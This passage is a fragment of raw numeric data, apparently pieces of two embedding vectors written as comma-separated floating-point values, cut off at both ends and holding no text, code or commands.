.0016620099,-0.006353388,-0.0045320326,0.007977322,0.024527384,0.01977906,0.0069196853,0.003756547,-0.0020957652,0.0045424458,0.0034752889,0.0066760564,-0.015765345,0.029162735,0.011413183,-0.0028844299,-0.020803588,-0.017085018,0.019043118,0.0028461618,0.004145819,0.005925544,0.014295772,0.007330221,-0.02888359,-0.0047820485,-0.0040360303,-0.0016601197,-0.0047697728,-0.014767716,-0.0048884293,-0.017787578,0.0019035992,-0.0008057595,0.0034191324,0.0020045626,-0.011926619,0.014883052,-0.00023653744,-0.009884275,0.012904123,-0.019882923,-0.0036533012,-0.0011412199,0.015902378,-0.013515122,0.014728244,-0.016580557,0.01356908,-0.007984587,-0.016724868,0.022933863,-0.004741983,-0.0045502177,-0.02505444,-0.013564397,-0.0018092295,0.002508438,0.04302459,0.0069665285,-0.007762188,-0.001315203,0.0077226427,-0.013801633,-0.029414944,-0.051665228,0.0071781017,0.029674543,-0.019354388,-0.005395899,-0.007500157,0.025777379,-0.005361133,0.019335022,0.010058623,0.00013474163,0.036055956,0.0016724744,0.005829849,-0.009484297,0.0287782,-0.032302316,0.009595353,-0.0011217026,0.008505213,0.0140437065,0.0015410285,-0.031202499,0.0064387517,0.0071922145,0.00048455017,-0.013950739,0.012048619,0.012777502,-0.020318622,-0.0074930307,0.0072390693,-0.008007197,0.021661993,-0.02082984,-0.018389897,0.019578975,-0.011328949,0.0058859107,0.022267412,0.022937398,-0.014412555,0.005951027,-0.006395062,0.0054922053,0.0019705251,-0.0042312187,0.008574503,0.010536623,0.004997786,-0.004520124,0.00383578,-0.009569295,0.012842776,0.0035997147,-0.012885803,-0.04293165,-0.0044593806,-0.002168827,0.0023229911,-0.008878189,0.03168429,0.0027384937,0.008492194,-0.0075594457,0.007664753,0.00017800274,-0.010873293,0.00021662498,-0.009211265,-0.006485784,0.017395051,0.008084005,-0.013500586,0.030868419,0.016380783,0.007904093,0.007552483,0.002602232,0.003464222,-0.0199452,-0.018598653,-0.0297965,-0.0023876326,-0.0054155393,-0.015963506,-0.014342214,0.0155110005,-0.0070295627,0.030036917,0.012618744,0.037116453,-0.014572292,0.011981941,0.015843637,0.009379548,0.03404594,0.009924034,-0.015794737,-0.013483416,-0.034233663,-0.00037323375,-0.018311026,0.010864892,-0.020714484,0.009260369,0.007901109,-0.025880124,-0.00041892746,0.0036609338,0.014293418,0.025405979,-0.012765266,-0.00039571122,-0.023577746,0.0020555193,-0.0025356181,-0.0031605067,-0.0051379623,0.0136203505,0.004821967,0.015616228,0.010899992,0.002744764,-0.016976787,0.011258802,-0.033939958,0.013962755,0.02427423,-0.013687929,-0.009681777,0.008851376,0.0073453295,-0.035686016,0.011150584,-0.0059273797,-0.00041440627,0.0016550143,0.009096458,0.010072351,-0.00024850434,-0.02285707,0.012936121,-0.0020828766,-0.015206045,-0.022106431,-0.007993792,0.012332464,-0.031257417,0.0043837857,-0.021910187,-0.004152999,0.010469527,0.022868259,-0.015495248,0.008880054,-0.0121353725,0.0069963615,-0.007716118,-0.023002118,-0.017522179,-0.005667787,0.0038363882,0.008686424,0.014643576,-0.007905107,0.020097945,0.01946344,0.007122229,-0.01504874,0.00012414288,-0.010886831,0.0008213615,-0.025963463,0.01734359,0.026836859,0.026929572,0.012138954,0.04117082,0.032827456,-0.00049586676,0.0033494057,-0.0075090663,0.0023788062,0.023855487,0.0071872207,-0.022293221,0.02078648,-0.019879539,-0.0057346113,0.010049376,0.007362259,-0.01263212,-0.0026746388,0.0057024574,-0.004972118,0.0038692087,0.0043327077,-0.005573754,-0.017516838,-0.0013069224,0.020019181,-0.016747175,-0.01679204,-0.01101366,-0.0048133847,0.0046977275,0.026109735,0.017295899,0.0044510877,-0.018005874,-0.0113069685,0.017227082,0.013669334,0.018114403,0.027124954,-0.0034308967,-0.03223008,0.020764349,0.0154152345,-0.00147156,-0.031522322,0.031014198,-0.010999212,-0.008795178,0.022882385,0.011617254,0.0091812685,-0.010208255,-0.008987809,0.0061510527,0.028605882,-0.021874554,0.022720428,-0.0066333204,-0.00040760546,0.020375494,-0.011471663,-0.021929061,0.005841619,0.016991526,0.011498344,0.01683841,-0.020499753,0.015833141,-0.025324624,0.026113283,-0.0028303722,-0.011719089,0.014631342,0.02351795,-0.012775577,-0.0016679327,-0.0042629186,-0.011563535,0.0047324905,0.019652864,-0.0028843002,0.005504367,0.0070076,-0.004519892,-0.010759987,-0.019034902,0.018568428,-0.0007081064,-0.0095139295,0.016386244,-0.029571664,-0.003501793,0.031635445,0.0047829663,-0.0071989307,0.003153378,0.011436714,0.05710025,-0.006029962,-0.02648116,-0.015752755,0.008135553,-0.001995386,-0.021710373,-0.00973643,0.011748157,0.015874976,-0.011954786,-0.010801221,-0.020963442,-0.012003091,-0.011143534,-0.026437456,0.005928116,-0.009118542,-0.0040927064,-0.016630976,-0.011253563,0.0013965585,0.020178566,-0.021881757,0.011412215,-0.0038206887,-0.010101913,-0.0006423901,0.0028796645,0.011631238,-0.010684404,-0.028037611,-0.0078044706,0.017935283,-0.01151693,-0.022454353,0.011924794,-0.0034887684,-0.0011303255,0.031356964,0.0060735857,-0.004324875,-0.000561753,0.010431857,-0.008619601,-0.007988544,-0.0050547267,-0.005759641,0.021118844,-0.01071032,0.020184565,-0.0035529789,0.016338632,-0.03516686,0.0013848519,0.008673467,0.02020567,0.07853554,-0.014562822,-0.034570582,0.025224851,-0.007313394,0.008301241,0.026978748,0.022189347,0.006143331,0.011694821,0.008405702,0.012158164,-0.013001303,-0.009294509,-0.008776865,0.016186977,0.0054295072,0.030468352,0.01353311,-0.016305974,0.008132378,-0.00802799,0.021930791,0.026301345,0.017878953,-0.022673117,-0.0004080018,0.0034745783,0.0038313703,-0.015561851,-0.006031453,-0.013433344,0.0020839097,0.004265088,-0.011018451,0.012734935,0.0119771855,-0.004133183,0.00405584,0.0017765001,0.014040758,-0.007921317,-0.024700968,-0.02276772,-0.084003344,-0.008847938,0.03080596,-0.021287058,0.021308813,0.0063255816,-0.024462646,0.011155261,-0.0035945205,0.009077788,-0.016114902,0.0015438246,0.010323594,0.029533071,0.003561017,0.016052043,-0.0069401045,-0.0016738406,0.0065990314,0.0047286446,-0.0016680281,0.023009,0.009037377,0.008600621,-0.015503933,0.0005188048,-0.008835362,-0.0043922495,-0.017325118,-0.00073552266,0.012150338,-0.0045531946,-0.019515865,-0.02445947,-0.0029143193,0.018717695,0.0033989022,-0.005137395,0.005347338,-0.032823406,0.009187762,0.0033633597,0.0013354216,-0.011850156,0.007272535,0.028250327,-0.014866688,-0.021561313,-0.034150127,-0.017466683,0.015810726,0.00888301,-0.015688213,0.03383345,0.0040727025,0.017287595,0.0007261414,-0.013778126,0.035571706,0.0030977756,-0.0052172258,0.00070510065,0.03188088,-0.016692981,0.005652599,0.012175786,-0.0066476744,-0.010930873,-0.021967024,0.00082007697,0.014135246,-0.021080418,-0.03358672,0.011207117,0.0009778598,0.0025520641,-0.014019186,-0.008477554,0.018962232,0.010769339,0.013325606,0.011354126,-0.015910134,-0.0058643036,0.0029003785,0.0006372836,0.006344889,0.02172975,0.03509315,0.0005129061,0.0032073427,-0.0064834235,0.009573073,-0.006147181,-0.0038578887,0.010113577,-0.009353233,-0.0076862657,0.0052347276,0.005809269,-0.015808055,-0.026293993,0.018527947,-0.012750776,0.0001797989,-0.015809864,0.0066094487,0.015868254,-0.004182795,0.022025855,-0.012875182,-0.0027070602,0.005732809,0.011515778,0.014935481,0.013700237,0.0076664616,0.012151261,-0.0060577937,-0.007626303,-0.02033606,-0.012357141,-0.005721741,0.026282523,0.027927615,-0.013922759,0.01136995,-0.00533764,-0.022657966,0.01883815,-0.01475703,0.010295357,0.027247278,0.023642423,0.0123724975,0.016557751,-0.006723654,-0.008873216,-0.018279081,-0.00050793553,0.00870118,-0.034386378,-0.008382474,0.001707882,0.0070341886,0.030659202,-0.0020943298,-0.009899675,-0.014117954,-0.00039909067,0.02284266,-0.018736975,0.011212615,0.0073748864,-0.0026733188,-0.002846339,0.02661389,0.008104632,-0.005702066,-0.01343189,0.0008715189,0.02517341,-0.0117053315,0.015597831,-0.010143334,-0.0067024995,0.011937102,0.012392712,-0.025398294,-0.026858993,-0.006581805,-0.011030796,0.0038692774,0.007094988,-0.009685258,-0.006389286,0.009635131,0.0043522203,0.0037580086,-0.009243956,-0.030142557,0.007899658,-0.0035999755,0.009695532,-0.0057829292,-0.023935184,-0.0039376477,-0.026195897,-0.009067312,-0.015323612,-0.012378573,-0.01231601,0.0000907782,0.027358659,-0.019886782,-0.016210131,-0.0031637058,0.022451421,-0.015018218,0.0034646124,-0.011482575,0.013289118,0.022320325,0.013573792,0.009057554,0.0073369225,0.011979376,-0.0022616615,-0.0063230097,0.0043812143,0.010426032,-0.0020406356,-0.0070191836,0.085416734,0.019029783,-0.026654549,-0.00655524,-0.0126144625,0.0069144405,0.02105494,0.015373425,0.005235693,0.01063357,0.014924428,0.0022322866,0.0060626734,-0.0065513467,-0.017033054,0.02444787,0.023513185,0.0031502985,0.016453277,-0.031540133,0.0064879293,-0.031856965,-0.004360827,0.021611912,0.016251653,-0.047343016,0.0146836825,0.05508669,0.0062384764,0.019188548,0.0064769494,0.019555999,0.023094002,-0.01063121,-0.01609585,-0.007443275,-0.006712294,-0.019906627,-0.007619827,-0.03351044,0.024320127,0.020306647,-0.012443714,-0.0022918568,-0.020739358,-0.00915498,-0.016168851,-0.011029613,-0.010348098,-0.01757053,0.0058506737,0.009560342,0.015718644,-0.013217534,0.009535981,-0.0033451712,0.0044283466,-0.016920026,0.00869209,-0.014697656,0.027842665,-0.0032868725,-0.002076667,-0.0017420634,0.013777907,-0.005147571,-0.018992694,0.00916654,-0.040879674,-0.036242653,0.045913752,-0.020836094,0.0075501082,0.02081606,-0.020198904,0.026371514,-0.014172378,-0.018263163,-0.029172542,-0.010195066,0.004993903,0.017221438,0.010902874,-0.0013670223,0.022339715,-0.010339227,-0.0027065966,0.021935456,0.008998713,-0.0041075195,0.010889394,0.015170811,0.009060706,0.011673516,-0.011600238,-0.013234321,0.035945106,-0.02962384,-0.0047172992,0.008490722,-0.015194591,0.0023872075,-0.023894625,-0.018703409,-0.016262118,-0.018503798,0.011568795,0.034692176,0.002883832,0.0007441461,-0.016850848,-0.01716539,0.0018898947,0.0033744373,0.01108378,-0.008376166,-0.009311591,-0.023031095,0.012634045,-0.00542262,-0.019874414,0.003516727,0.0056560887,0.040192563,0.005153425,0.01953785,-0.013554455,0.024162024,0.005275966,-0.009712389,0.010020745,-0.037752666,-0.02154617,-0.0011944822,0.002518321,0.025035957,0.009405346,-0.0009735882,-0.007965444,-0.0034834999,0.014848147,-0.013422473,-0.0065084826,0.002681976,0.01747068,-0.00651247,0.020319227,-0.012198876,0.011073226,0.00037494992,-0.023137126,0.0009421702,0.0037369344,-0.016284171,-0.007038891,-0.02798215,0.01091972,0.000052667547,-0.011574204,0.0058239377,-0.014210838,-0.010368008,0.01609182,-0.037708573,0.022354076,0.0084542055,-0.008709326,0.0031524776,-0.004519178,0.003325442,0.0013622543,-0.011709037,-0.0038450789,0.020234983,-0.010908284,-0.008167625,0.013530732,0.0071764924,-0.015499473,0.002844389,0.01594689,0.024247717,-0.008502801,0.0059022494,-0.00275639,-0.00095890445,-0.014668499,0.0134954825,-0.014160334,0.030794013,-0.007839462,0.02012894,-0.0048476206,0.013156051,0.022247821,0.0095667625,-0.021938581,0.044914927,-0.0048122853,-0.05624926,0.00033220538,-0.011530019,0.005370234,-0.017081598,0.0072592,-0.00009003791,0.010102052,0.011461186,0.0003688352,-0.0042477613,0.005200715,0.0038816736,-0.008906713,-0.0011944949,0.00054190145,0.018749934,-0.026139982,-0.0037550088,0.00045514372,0.009640707,-0.0045750085,-0.018860139,-0.009531367,-0.012194162,-0.0038163357,-0.018891634,-0.0020017498,0.022835292,0.00343574,-0.010373798,0.0040734992,0.021871043,-0.011719021,-0.0016622929,-0.02117184,-0.0039538774,0.014231768,-0.001998828,-0.004046742,0.010783987,0.017983168,-0.02210758,0.0047210366,-0.014322565,-0.029697293,-0.01462129,0.0055357832,-0.014992758,-0.017867636,-0.039593834,-0.032629345,0.011717561,-0.034600716,-0.0055910163,-0.024881022,-0.013281102,0.026404262,0.009911554,0.006792172,-0.012692693,-0.013201588,-0.006367557,0.01719004,0.0066280714,-0.0010618953,-0.015373144,0.008448684,-0.013427423,-0.012281235,-0.019161236,-0.019899873,-0.0084692575,-0.02547003,0.012713976,-0.018849377,-0.0005648273,-0.010517426,-0.0060210726,-0.014457325,0.015906861,0.0023534887,-0.026958222,0.022764247,-0.036236107,0.0061555514,-0.0051437235,0.030152533,0.010924947,0.058168467,-0.06292748,-0.009892775,0.029316546,-0.007320091,0.010834937,0.011073132,-0.0073862933,-0.093812615,-0.03237146,0.011073165,-0.005493457,-0.009022947,-0.019116016,-0.0056348755,-0.0016727943,-0.014119462,0.0049520326,0.011233037,0.0038806063,-0.014933794,0.039395392,0.014436419,0.00028076585,0.007635117,-0.016033668,-0.0128219,-0.005041398,0.017900102,0.013338834,-0.008413835,0.010630752,0.014673167,-0.021030221,0.010368957,-0.0043954877,0.006229111,0.0038854226,0.016563475,-0.016305014,-0.031178024,-0.0037674215,0.014154207,0.010126236,0.024562363,-0.010079908,-0.010224592,-0.009800014,0.01921978,0.15709573,0.021429311,-0.0144666,-0.018432014,-0.0074292556,-0.030231755,-0.0010267441,0.01479818,-0.010023563,-0.004433396,-0.007119803,-0.014781935,-0.0015478854,-0.0015495729,0.0030017926,0.0006831251,0.0015952513,0.13038148,-0.003260223,0.029925559,0.020650307,-0.020096725,0.02333163,0.018345585,0.010725042,0.0068077887,-0.0060429266,-0.042368807,0.019543465,-0.0064748563,-0.00541006,0.032760132,0.0020732307,-0.007023736,-0.00062143704,0.009762071,0.00044340157,-0.004923491,-0.019463334,0.004537682,0.01302937,-0.015348055,0.0045114765,-0.012708582,-0.002701109,-0.008911605,0.007893163,-0.015379883,-0.018743182,0.025986258,0.015912758,-0.014266619,-0.0007611178,-0.010177548,-0.013448022,-0.00814089,0.0048436876,-0.0003173569,-0.012988374,0.016958615,0.0050586713,0.0022716275,0.0002383741,-0.00039918823,-0.016851876,-0.0009228307,-0.0061241155,0.0019130504,-0.016171424,0.003905671,-0.000020648626,0.008604062,0.0047828206,0.006864316,0.022199664,0.004699094,-0.009658462,-0.016641703,-0.019219428,-0.010189979,0.015882218,0.025184141,-0.018769704,-0.017717754,0.027453132,0.01599812,0.006114496,-0.008753918,-0.0024223225,0.018490745,-0.012712418,-0.026991708,-0.00074201147,0.022810964,0.0027054634,0.0010301399,-0.0049725454,-0.0074734283,0.009770284,0.004470765,-0.014475014,0.026283067,-0.0016705579,0.01770039,-0.0020401073,0.015204166,0.0064000925,0.005557329,-0.02424808,0.0026917742,0.020632435,0.005237262,0.0024325629,0.015170924,-0.015233467,-0.0014274179,0.0121017145,0.0051792334,-0.025477603,0.014841997,-0.01233473,-0.008574524,0.028850954,0.0034731207,-0.0146995215,0.0045092693,-0.005788672,-0.004715262,-0.031700134,-0.00013805926,-0.005318938,0.008269005,-0.0034400495,0.023383863,-0.012175834,-0.020152116,0.0025677478,-0.016923971,-0.00006197775,-0.0061504296,-0.004044149,0.011831716,0.014944542,-0.005017395,-0.008351532,-0.00032828937,0.020965591,0.007580165],[-0.017042503,-0.0044032987,0.0067353747,-0.018179787,0.0050300155,-0.016773699,0.009030445,0.018132692,0.01638436,-0.015914429,-0.007332507,0.033486642,-0.011822407,0.052800234,-0.0061118924,-0.013201945,0.010999105,0.0028405974,0.025654793,-0.023023434,0.012655575,0.00016491726,0.017700847,-0.013769663,0.009877654,0.021443605,0.0055386685,-0.0069846213,0.003555646,-0.0045820074,0.011480934,0.022629915,0.010664647,0.007846201,0.014249102,0.016657272,-0.002098938,0.002436338,0.0042903973,-0.009321859,0.0043746564,0.0033693581,-0.021054955,0.02271045,0.0010141536,-0.017589191,-0.010909156,-0.028820662,-0.020608159,0.016765682,-0.006498185,0.02504934,-0.0008304151,0.0044680466,0.002560435,-0.0012115145,-0.0033372545,-0.049819425,0.028633034,-0.0076752165,-0.022423914,0.014359962,-0.014639088,-0.0025789267,0.02523064,0.002691447,-0.006012055,0.005347761,-0.0071420907,-0.017147431,0.026912011,0.018981809,0.005390674,0.008055938,-0.003199283,0.012699628,-0.012289682,-0.0052509527,0.0025670356,0.0207332,-0.04675728,-0.007846631,-0.00079807604,-0.012984774,0.009798675,-0.0028349552,-0.011229274,-0.0076801544,-0.0024037196,-0.0095560355,0.015934462,-0.0036747241,-0.016014917,0.017807845,-0.010698828,0.007947998,-0.008764274,0.011188954,-0.017690973,-0.01562437,0.008141914,-0.031554755,-0.02138526,0.0068787793,0.0032485991,0.027171774,-0.000039169932,0.012193601,0.017383346,0.0066834516,0.00087377825,0.014584121,0.0042903735,-0.02493592,-0.017340755,0.020270178,-0.0034331265,0.012190178,-0.011931938,0.007664606,0.01415667,0.0063258247,0.014347066,-0.015678853,-0.009497474,0.0038842682,-0.000636546,0.0016277015,-0.008703413,-0.02760121,-0.015258405,0.0034718201,-0.011549214,-0.0039462047,-0.0020544995,-0.018132035,0.009939323,-0.01321577,0.012557215,-0.017247228,0.032144416,0.0034057056,0.027636414,-0.013245287,0.002639784,0.008051555,0.0131427245,0.0115743,0.01455426,-0.014796726,-0.0042489497,-0.0073252358,-0.019414088,-0.008583927,-0.0005561744,-0.0028230252,-0.017812667,-0.005493637,0.013047467,0.01598582,-0.015848918,-0.0009440191,-0.003966681,0.034257863,-0.0015157523,0.028469924,-0.0035044916,0.000041208474,0.0029337402,-0.002020504,0.012274299,0.028358422,0.009541984,-0.0064204633,-0.012397218,-0.020277338,0.013695825,-0.008697831,0.014980969,0.021162491,-0.0066385064,0.040138647,0.007739173,0.0066305357,0.00043837752,0.036877457,0.0043701106,0.0015408623,0.0028573042,-0.001764546,0.009233751,-0.013600559,-0.009768273,-0.0088947,-0.008456684,-0.022115188,-0.012275873,0.116779886,-0.016067648,-0.009029477,-0.01782159,-0.01310815,0.00782064,-0.023939257,-0.021308254,0.010872411,-0.026503159,0.005502202,0.008235655,-0.014464517,0.013123932,-0.015630957,0.023305673,0.018187882,0.006307902,-0.09442693,0.030822746,0.01796266,-0.025108159,0.018526096,-0.00012442732,0.0053221714,-0.008148838,0.0010066978,-0.0087658875,0.0033697018,0.004413925,-0.0046165623,-0.015988365,-0.01216046,0.014599346,0.015057971,-0.023878876,-0.024535695,0.0095237065,-0.02290357,0.015146089,-0.008246405,0.0055378852,-0.0037559997,-0.028493186,0.0006557026,0.028745394,0.015079921,-0.010136972,0.011508263,0.0051885005,0.0014999406,-0.016389301,0.011868098,-0.0032433062,-0.016805282,0.014495664,0.017071582,0.0038565288,-0.01959183,-0.015551822,-0.011620181,0.01621541,0.023224982,0.0005583438,0.025036592,-0.019096801,0.008627367,0.020345733,0.0065804273,0.0013122943,-0.04189597,0.0057532135,-0.03492495,-0.03416559,0.0061785337,0.016042287,-0.014543278,0.021840213,-0.0056351116,0.008237734,0.0036663585,0.010613767,-0.009283026,-0.00054204586,-0.0019114834,-0.0075421706,0.0037677048,-0.002008707,-0.006126339,0.02802887,-0.0017564421,0.02123001,-0.0077096303,-0.0059752045,0.014262513,0.031286627,0.005153626,-0.013135426,-0.012477384,-0.0425636,0.040589996,0.01959849,-0.009128172,0.0005616578,-0.017532323,0.016814869,-0.018339282,0.012602923,-0.011293519,-0.018889084,-0.021017762,0.0015040744,-0.0009321856,-0.019547785,-0.012339652,0.0045208335,0.0059341826,0.019022355,0.021540834,-0.00273022,-0.010252993,-0.0050722696,0.001309115,0.010021479,-0.0004951584,0.00981158,-0.0046168426,0.00015311506,-0.011469693,0.015818447,-0.012850303,0.017893903,0.029393507,0.016983924,-0.0075555844,0.00971333,0.020157656,-0.051556442,0.006272935,0.0014702837,0.016248088,0.009951053,0.04135507,-0.010861904,0.0048881075,-0.022880202,0.009387227,0.0030425047,0.0024283233,-0.029237896,-0.01034794,-0.0015192417,-0.008727464,0.008187052,-0.011977606,-0.0068272916,-0.0010873883,-0.004120748,-0.0058762836,-0.010467129,-0.015460607,-0.008134644,-0.015370063,0.023216097,-0.011477261,0.02902883,-0.011310825,0.08389936,0.01954344,0.014908558,0.013486805,0.0050281845,-0.012557894,0.04223525,0.020714236,0.025428493,-0.00735933,-0.0063890214,-0.022821814,-0.0048522097,0.030385548,-0.008679628,-0.004339053,-0.03106085,-0.00087908143,-0.0042030658,-0.031140437,0.05451036,0.0017432472,-0.020614902,0.01650682,0.027919317,0.0030780046,0.012490319,-0.012220093,-0.01033138,-0.013386853,-0.017275348,0.0026753934,0.007509381,-0.011234277,-0.008401957,0.018203082,-0.009873291,-0.004672911,0.0036198637,-0.011777261,-0.004554568,0.0048755673,0.0033777058,0.0017279587,-0.008384551,0.039614193,0.012567192,0.011451682,-0.0020388255,0.013722983,0.0034990257,0.023426455,-0.026307715,0.019429494,-0.016412145,0.0048160097,0.0069416314,-0.015587731,0.024511818,0.04058007,0.03848763,0.0136373555,-0.026561724,0.0025264968,0.0002190283,0.0437986,-0.0056892354,-0.003566283,-0.030899072,-0.020360228,-0.0014212145,0.02292209,-0.010392308,0.014070961,-0.019898852,0.009861349,0.0025636244,-0.020690601,-0.021047585,0.046762142,0.008296407,0.01104047,0.00004208425,0.007929067,-0.008097869,-0.021521445,-0.0031537872,-0.0031836627,0.017680166,-0.026212553,0.03968489,0.016373578,0.02748386,-0.019989805,0.009391159,-0.0074447305,0.015699536,-0.013604281,0.0062749977,0.011272543,-0.02182091,0.010083264,0.01673309,-0.0167971,0.00574689,-0.009759569,0.009634647,-0.015654065,0.0071685924,0.029469207,-0.022497004,-0.0000033171527,-0.0051455926,0.0067964224,0.018400278,-0.014443772,0.004516696,0.010718558,-0.0031015868,0.035544552,0.02243984,-0.0019348573,0.0045099603,0.022702046,-0.010551308,0.025284763,0.012157324,0.009206372,0.021798436,0.02647985,0.020071525,0.00624872,-0.009104509,-0.035052136,-0.020609701,0.005508784,0.010053221,-0.007115244,0.04182078,0.022313604,-0.0037422525,-0.01641111,0.00062665564,0.015647499,-0.00030897022,0.015135376,0.004352086,-0.0007456715,0.011575549,0.0054580905,0.008020247,-0.014221725,0.0086455,-0.00032401425,0.001769262,-0.00018518193,0.023036972,-0.013020886,-0.03229582,-0.0073477156,0.027948191,-0.02940028,0.011615249,0.011533187,-0.0048259962,0.02225968,0.007882835,0.081608705,-0.0029545778,-0.039364163,-0.010344056,0.0030994152,-0.006226964,-0.016378663,0.0041479226,-0.0070474646,-0.010061465,-0.0078727305,0.010506279,0.010733958,0.014561767,-0.024393128,0.0027764316,-0.001985508,0.006529283,-0.0010640676,-0.018497784,0.008716526,0.008010543,-0.010549922,-0.0338254,-0.01370825,-0.0004866579,0.023921197,0.012651992,0.0136682,-0.0067350264,-0.013718332,-0.00399811,0.01635234,-0.0036192364,-0.0072515346,-0.0018563068,-0.01219384,-0.0077460455,0.01599196,0.03603133,0.0054441122,-0.0061608795,0.0185912,0.018898197,-0.0002329106,-0.0013863682,-0.026489653,0.0009888486,0.013389441,0.014417417,-0.01262579,0.0045105186,0.0012998219,0.010144233,-0.00036319168,-0.009849872,0.029120332,0.016894162,-0.01155325,0.02612017,-0.0068089,0.011918011,-0.0010723956,-0.025561703,-0.0026435275,0.002802368,0.03192115,-0.009348724,-0.0005684269,-0.02421356,0.018561454,0.005466793,0.012411294,0.00006123224,0.012001411,0.034119844,0.009656347,0.019638184,0.020484451,-0.017442303,0.008574146,0.0075357333,-0.0055316375,0.007035758,-0.013991657,0.0031540748,0.005641699,0.0260073,0.0013988193,-0.04533183,0.01706711,0.008824203,-0.00781596,-0.0013230654,0.0073983036,-0.0005049634,-0.0014990579,-0.006091397,0.0053137573,-0.016811809,-0.0059286538,-0.0403905,-0.0054025752,0.03967119,-0.0043216157,0.0053230054,0.0073538045,0.017439067,0.014764384,-0.006940605,-0.0006842002,-0.05369769,0.012266462,0.0040905764,-0.00192243,-0.017541356,0.042267386,-0.022352766,0.0024113716,-0.0039493465,-0.006651127,-0.01491406,-0.000013307224,-0.008698271,0.0119952485,0.018875105,0.005523562,-0.012123764,-0.029691568,-0.019257514,-0.056642633,0.01698041,0.038733803,-0.0047791866,0.015414435,-0.0077485945,0.0040362193,0.00017027046,0.005308051,0.0014234019,-0.009705983,-0.011118094,0.013164235,-0.0036250013,-0.01313813,0.010911247,0.010239959,-0.0042080046,0.009246563,0.0015895449,-0.014995069,0.028341794,-0.019990703,-0.011876219,-0.015073491,-0.008727992,0.010014958,-0.014134435,0.010127895,0.004629592,0.04311414,-0.000073671355,0.0061983317,0.012122127,0.0013646687,0.007571651,0.013245181,0.0029342188,0.02883728,-0.0049312487,-0.016155371,-0.0062210797,0.00813373,-0.003122897,-0.01892642,-0.008345803,0.0271599,0.033510726,0.009074758,0.0043649306,0.014648888,-0.0032598614,0.022676723,0.007822923,0.0052175275,0.011097404,0.013950963,0.017550709,0.022779748,-0.016491076,-0.010388778,0.012865652,-0.011235618,-0.0431665,0.013993186,-0.0036053327,-0.029072117,0.0037007867,-0.0043959534,-0.0077600763,-0.006296064,-0.017039228,0.00057788217,-0.012178641,0.0011506444,-0.013017365,-0.0077623264,-0.020707674,-0.04551279,-0.003175738,0.023603803,0.0054657236,-0.010159537,-0.018225031,-0.012121597,-0.011886627,-0.008737052,-0.016763091,0.012793104,-0.00232476,0.018717153,0.008890022,0.015561639,-0.01139023,-0.010155211,0.007855749,0.035293743,0.0009605553,0.00947168,0.0017973545,-0.007349037,0.017568931,0.031683173,0.005874291,-0.026805446,0.008383457,0.020113094,-0.012808921,-0.017090213,-0.005090948,0.013844881,0.028990382,0.0066241864,-0.022274012,-0.009390199,-0.012187926,-0.0095863165,0.032119013,-0.012242484,-0.007324003,-0.008313213,0.010804216,0.018743236,-0.0122435335,0.010303915,0.00038505977,-0.0037243837,-0.008077342,-0.0011975653,0.022788739,0.011371487,0.013146562,0.002931954,-0.037839346,-0.008873293,-0.01554961,0.032538567,-0.0072389464,0.005493181,0.0011939901,-0.02528135,-0.014203326,0.01468335,0.014164086,-0.013781173,0.01004704,0.0021672938,-0.053940788,0.0013829699,-0.00277443,0.0030870512,0.00943443,-0.013521822,-0.01908033,-0.017064601,-0.0036044791,-0.016943237,-0.038614795,0.007626696,-0.030943358,-0.020676687,-0.0030072404,-0.021107158,-0.027079025,0.00943218,-0.0005294618,0.008924412,0.017334767,-0.0064505353,0.012669135,-0.024406785,0.0150879985,-0.0027024115,0.0049980385,-0.024192695,-0.006118489,0.0027215716,0.008156725,0.023490475,0.0009183838,-0.0116592515,0.032118816,-0.011420317,-0.027169472,0.018262101,0.0006262479,-0.003303806,-0.013520118,-0.008172031,-0.013301398,-0.012179831,0.0048842304,-0.012636227,0.02133985,0.007223796,-0.0023236407,0.013114474,0.017812053,-0.014137891,-0.024177385,-0.009915054,0.004886175,-0.004825358,-0.024001513,0.003121316,-0.0005427697,-0.0036524853,0.0035225619,0.03465355,0.0057750144,0.015631432,-0.022043476,0.010107834,0.003240634,-0.03379324,-0.0053517716,-0.023764364,-0.0032628465,-0.008719384,0.00019640576,0.009881927,0.011952641,0.009812549,-0.00348329,-0.00016624192,0.0012203071,-0.010005855,0.01235503,-0.012563404,-0.040364217,-0.0057611684,0.027266882,-0.04284366,0.0052366643,-0.022110645,0.0037822735,0.002480073,-0.0268238,0.0050083133,0.010568148,-0.0034235355,0.0010382012,0.0142722735,-0.00014182512,-0.008250987,0.022700548,0.008122288,-0.014117115,-0.0037456495,-0.0010244987,0.024156483,-0.009235615,0.022159616,0.012072235,0.027464302,-0.0030617293,-0.02617017,-0.019686166,-0.024453906,0.01825789,-0.0251294,-0.0013810628,0.004309466,0.02887046,-0.033970773,-0.004770886,-0.009017409,-0.0006264289,0.030147403,-0.016138867,0.04965978,-0.0017353875,0.021275632,-0.0019669668,-0.01157134,0.016016603,-0.022222124,0.012311164,0.022490194,0.014202561,-0.0094729485,-0.009228491,0.005347086,-0.0049488167,-0.0014900999,0.042876303,-0.0022017397,0.009655724,-0.0019409298,-0.006953632,0.000072419614,0.015245168,-0.016061166,-0.020670198,0.026118344,0.015901724,-0.0053257532,-0.002834355,0.0041767266,0.008030109,-0.016543036,-0.008702209,-0.017391512,0.008087696,-0.020074792,-0.00021870632,0.0070190877,0.0011950538,0.015209375,0.01685526,0.010235275,-0.016517581,-0.030206893,-0.0013208927,0.011862759,-0.018662173,-0.017189741,-0.01523287,-0.012656278,-0.011530256,0.019500462,-0.013543956,0.007993222,-0.0020891642,-0.0043828036,-0.012632694,0.014569134,0.010140373,-0.014282252,0.01590306,0.031687003,0.013195384,0.02088769,0.01283784,0.0032083024,0.004852407,-0.007552675,-0.000658823,-0.012738347,0.009285201,0.034790553,-0.02391379,-0.013842991,0.0026243003,0.024916122,-0.010253903,-0.004736044,0.028618367,-0.010394521,-0.010305884,-0.004981964,-0.008032374,0.035936225,0.01736837,-0.008831572,-0.0043155216,-0.008430692,-0.008221246,-0.014977806,-0.024345936,0.00028568687,-0.011840048,0.028599922,-0.007198023,0.0332239,0.009447098,-0.022147737,0.0076712933,-0.0030076317,-0.001597042,0.035422888,-0.0010611436,0.023196818,0.012624453,0.040179547,-0.00047177306,-0.0005234601,0.013783088,-0.00031780047,-0.010248208,0.023057865,-0.010042373,0.00075893436,-0.0042302143,0.00049883523,0.019433387,0.012544787,-0.011717037,-0.0065557184,0.01556886,-0.0006125902,0.0069738966,-0.027784387,-0.0035945727,0.017872505,0.09901355,-0.0068653906,0.0064051794,0.00043305827,0.019593192,0.0026364692,-0.020640945,0.0006189934,0.027714308,-0.0024667804,-0.008066137,0.025965396,-0.011914012,0.012748206,0.0012878238,-0.013968448,0.024170905,-0.013957462,-0